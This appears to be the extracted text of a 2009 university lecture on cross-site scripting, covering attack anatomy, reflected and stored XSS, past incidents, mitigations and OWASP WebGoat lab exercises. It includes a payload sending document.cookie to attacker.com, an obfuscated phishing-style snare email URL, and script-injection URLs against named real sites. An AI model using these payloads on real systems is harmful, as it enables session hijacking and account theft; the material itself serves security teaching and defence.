Cross Site Scripting (XSS) Charles Frank Northern Kentucky University

Cross Site Scripting (XSS)

Charles FrankNorthern Kentucky University

March 4, 2009 SIGCSE

Cross-Site Scripting (XSS)• Attacker causes a legitimate web server to send

user executable content (Javascript, Flash ActiveScript) of attacker’s choosing.

• XSS used to obtain session ID for– Bank site (transfer money to attacker)– Shopping site (buy goods for attacker)– E-mail

• Key ideas– Attacker sends malicious code to server.– Victim’s browser loads code from server and runs it.


Vulnerability Trends for 2006


Anatomy of an XSS Attack1. User logs into legitimate site.2. Site sends user authentication cookie.3. Attacker sends user XSS attack containing injected code.4. User clicks on XSS link in email, web, IM.5. Browser contacts vulnerable URL at legitimate site with cookie in

URL.6. Legitimate site returns injected code in web page.7. Browser runs injected code, which accesses evil site with cookie in

URL.8. Evil site records user cookie.9. Attacker uses cookie to authenticate to legitimate site as user.


XSS Example

Client browser sends an error message to the web server.

https://example.com/error.php?message=Sorry%2C+an +error+occurred


XSS Example

The error message is “Reflected” back from the Web server to the client in a web page.

<p>Sorry, an error occurred.</p>


XSS Example

We can replace the error with JavaScript

https://example.com/error.php?message=<script>alert(‘xss’);</script>


Proof of Concept


Exploiting the Vulnerability

1. User logins in and is issued a cookie2. Attacker feed the URL to user

https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script>



• The server responds by sending the user a web page that runs the Java script.

• The code makes a request to attacker.com containing the session token.



• The attacker monitors requests to attacker.com.

• He uses the captured session token to gain access to the user’s personal information and perform actions as the “user”.


Email Snare

From: “Example Customer Services”To: “J Q Customer”Dear Valued Customer,

You have been selected to participate in our customer survey. Please complete our easy 5 question survey, and return we will credit $5 to your account.


Email Snare

To access the survey, please log in to your account using your usual bookmark, and then click on the following link:

https://example.com/%65%72%72...?message%3d...att%61%63%6b.com...docum%65..%63ookie...


Reassuring Email

• The link contains the correct domain name (unlike phishing).

• The URL has been obfuscated• It uses https


Reflected XSS

Reflected XSS– Injected script returned by one-time message.– Requires tricking user to click on link.– Non-persistent. Only works when user clicks.


Anatomy of an XSS Attack

1. Login

2.

Cookie

Web Server

3. XSS Attack

AttackerUser

4. User clicks on XSS link.

5. XSS URL

7. Browser runs injected code.

Evil site saves ID.

8. Attacker hijacks user session.

6. Page with injected code.


XSS URL Exampleshttp://www.microsoft.com/education/?

ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>

http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script>

http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1

http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E


Stored XSS

Stored XSS– Injected script stored in comment, message, etc.– Requires ability to insert malicious code into web

documents (comments, reviews, etc.)– Persistent until message deleted.


Stored XSS

• Auction site that allows buyers to post questions and sellers to post responses.

• If an attacker can post a question containing a script, the attacker could get a user to bid without intending to or get the seller to close the auction and accept the attacker’s low bid.


Why does XSS Work?

Same-Origin Policy– Browser only allows Javascript from site X to

access cookies and other data from site X.– Attacker needs to make attack come from site X.

Vulnerable Server Program– Any program that returns user input without

filtering out dangerous code.


XSS AttacksMySpace worm (October 2005)

– When someone viewed Samy’s profile:• Set him as friend of viewer.• Incorporated code in viewer’s profile.

Paypal (2006)– XSS redirect used to steal money from Paypal users in a

phishing scam.BBC, CBS (2006)

– By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department.


Impact of XSS1. Attackers can hijack user accounts.2. Attackers can hijack admin accounts too.3. Attacker can do anything a user can do.4. Difficult to track down source of attack.


Mitigating XSS1. Disallow HTML input2. Allow only safe HTML tags3. Filter output

Replace HTML special characters in outputex: replace < with < and > with >also replace (, ), #, &

4. Tagged cookiesInclude IP address in cookie and only allow access to original IP address that cookie was created for.

XSS Problem

• XSS is a complex problem that is not going away anytime soon.

• The browser is insecure by design. • It understand JavaScript.• It isn’t the browsers job to determine what

code is good or bad.• Disabling scripting seriously dampens the

user’s browsing experience.



Cross-Site Scripting Demo

OWASP WebGoat

• http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

• WebGoat 5.2 Standard• WebGoat 5.2 Developer• Run webgoat.bat to start Tomcat• Enter http://localhost/WebGoat/attack in

your browser


http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

http://localhost/WebGoat/attack

OWASP WebGoat

Username: guestPassword: guest

Start WebGoat


Reflected XSS Attacks

• Solution:– Enter <script>alert('Bang!')</script> for the PIN

value

• View Page Source– Edit | Find | Bang


Stage 6: Blocked Reflected XSS

• You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java. Alter the method getRequestParameter. The body of the mehtod should look something like this:


Stage 6: Blocked Reflected XSS

String regex = "[\\s\\w-,]*";String parameter =

s.getParser().getRawParameter(name);Pattern pattern = Pattern.compile(regex);validate(parameter, pattern);

return parameter;


Stage 1: Stored XSS

• First Login as Tom with tom as password. • Select Tom from the list and click on the View

Profile Button. Now should appear Tom's Profile.


Stage 1: Stored XSS

• Click on the 'Edit Profile' Button and try an XSS attack on the street field.For example: <script>alert("Got Ya");</script>

• Click on the UpdateProfile Button and Log out.


Stage 1: Stored XSS

• Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the ViewProfile Button.


Stage 2: Blocked Stored XSS using Input Validation

• Solution:You have to alter the method parseEmployeeProfile in the class UpdateProfile.java which is placed in the package org.owasp.webgoat.lessons.CrossSiteScriptingThe place to code is marked!



String regex = "[\\s\\w-,]*";String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+startDate+ccn+disciplinaryActionDate+disciplinaryActionNotes+personalDescription;Pattern pattern = Pattern.compile(regex);validate(stringToValidate, pattern);



• This validation allows following:\s = whitespace: \t\n\x0B\f\r\w = word: a-zA-Z_0-9and the characters - and ,

• Use of any other character will throw a Validation Exception.


Stage 3: Stored XSS Revisted

• Log in as David with david as password. Choose Bruce from the List and click on the 'ViewProfile' Button.


Stage 4: Blocked XSS using Output Encoding

• You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.

• This method changes all special characters in the string. • Now you have to use this method in the getEmployeeProfile

method in the org.owasp.webgoat.lessons.CrossSiteScripting class. Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.


XSS References


Documents

Cross Site Scripting (XSS) Charles Frank Northern Kentucky University